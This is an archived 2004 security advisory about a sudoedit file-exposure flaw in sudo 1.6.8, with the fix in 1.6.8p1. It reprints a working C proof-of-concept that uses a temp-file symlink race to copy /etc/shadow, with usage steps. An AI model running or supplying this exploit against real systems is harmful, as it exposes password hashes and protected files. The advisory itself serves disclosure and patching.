Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[UNIX] Sudo -u Parameter File Exposure

from [SecuriTeam] Network Security [Permanent Link]
Subject: [UNIX] Sudo -u Parameter File Exposure
Date: 5 Oct 2004 12:00:08 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Sudo -u Parameter File Exposure
------------------------------------------------------------------------


SUMMARY

 <http://www.sudo.ws/sudo/sudo.html> Sudo (superuser do) allows a system 
administrator to give certain users (or groups of users) the ability to 
run some (or all) commands as root or another user while logging the 
commands and arguments.

A flaw in exists in sudo's -u option (aka sudoedit) that can give an 
attacker read permission to a file that would otherwise be unreadable.

DETAILS

Vulnerable Systems:
 * sudo 1.6.8 and prior

Immune Systems:
 * sudo version 1.6.8p1 and newer

While sudoedit runs the actual editor as the invoking user, the temporary 
file is then re-opened with root privileges. An attacker can run sudoedit, 
remove the editor temporary file, make a link to an unreadable file with 
the same name as the old temporary file and quit the editor. The file 
being edited via sudoedit will now contain a copy of the previously 
unreadable file.

Impact:
Exploitation of the bug requires that the sudoers file be configured to 
allow the attacker to run sudoedit. If no users have been granted access 
to sudoedit there is no impact.

Fix:
The bug is fixed in sudo 1.6.8p1.

Exploit:
/*

    Copyright   Rosiello Security 2004
          http://www.rosiello.org

                  sudoedit Exploit


SOFTWARE : sudoedit
REFERENCE: http://www.sudo.ws/sudo/alerts/sudoedit.html
DATE: 18/09/2004

Summary:
A flaw in exists in sudo's -u option (aka sudoedit)
in sudo version 1.6.8 that can give an attacker
read permission to a file that would otherwise be
unreadable.

Sudo versions affected:
1.6.8 only

Credit:
Reznic Valery discovered the problem.

-----------------------------------------------------------

All the information that you can find in this software
were published for educational and didactic purpose only.
The author published this program under the condition
that is not in the intention of the reader to use them
in order to bring to himself or others a profit or to bring
to others damage.

!Respect the law!

How do I use this code ?

To exploit sudoedit you have to open with it the
file "rosiello" as shown in the example.

EXAMPLE SCENARIO:

1) Open two shells (i) and (ii);
2) (i)$sudoedit rosiello;
3) (ii)$./sudoedit-exploit /etc/shadow;
4) (i) close sudoedit.

The file "rosiello" is now a copy of "/etc/shadow".

AUTHOR : Angelo Rosiello
CONTACT: angelo@rosiello.org

*/

#include <stdio.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <dirent.h>


int main( int argc, char *argv[] )
{
 char PATH[]="/usr/tmp";
 char file[32];
        DIR *tmp;
        struct dirent *de;
 int found = 0;
 
 printf( "Copyright   Rosiello Security 2004\n" );
 printf( "http://www.rosiello.org\n"; );

 if( argc!=2 )
 {
  printf( "USAGE: %s file\n", argv[0] );
  return( -1 );
 }


 tmp = opendir ( PATH );
 while ( !found && (de = readdir ( tmp ))!= NULL )
 {
  if ( (strstr(de->d_name, "rosiello") != NULL) )
         {
   if( strlen(de->d_name) > 22 ) return( -1 );
   sprintf( file, "%s/%s", PATH, (char *)de->d_name );
   remove( file );
   if( fork()!=0 )
   {
    execl( "/bin/ln", "ln", "-s", argv[1], file, NULL );
   }
   wait( );
   printf( "Now you can close sudoedit and reopen rosiello!\n" );
   found=1;
  
  }
  
        }
 closedir( tmp );
 
 if( !found )
  printf( "File Not Found!\n" );
 return( 0 );
 
}


ADDITIONAL INFORMATION

The information has been provided by Reznic Valery.
The exploit code has been provided by  <mailto:angelo@rosiello.org> Angelo 
Rosiello.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] Sudo -u Parameter File Exposure, SecuriTeam <=
Previous by Date:  [NEWS] Inkra 1504GX IP Protocol Parsing DoS, SecuriTeam
Next by Date:  [UNIX] MySQLguest Arbitrary Code Injection, SecuriTeam
Previous by Thread:  [NEWS] Inkra 1504GX IP Protocol Parsing DoS, SecuriTeam
Next by Thread:  [UNIX] MySQLguest Arbitrary Code Injection, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]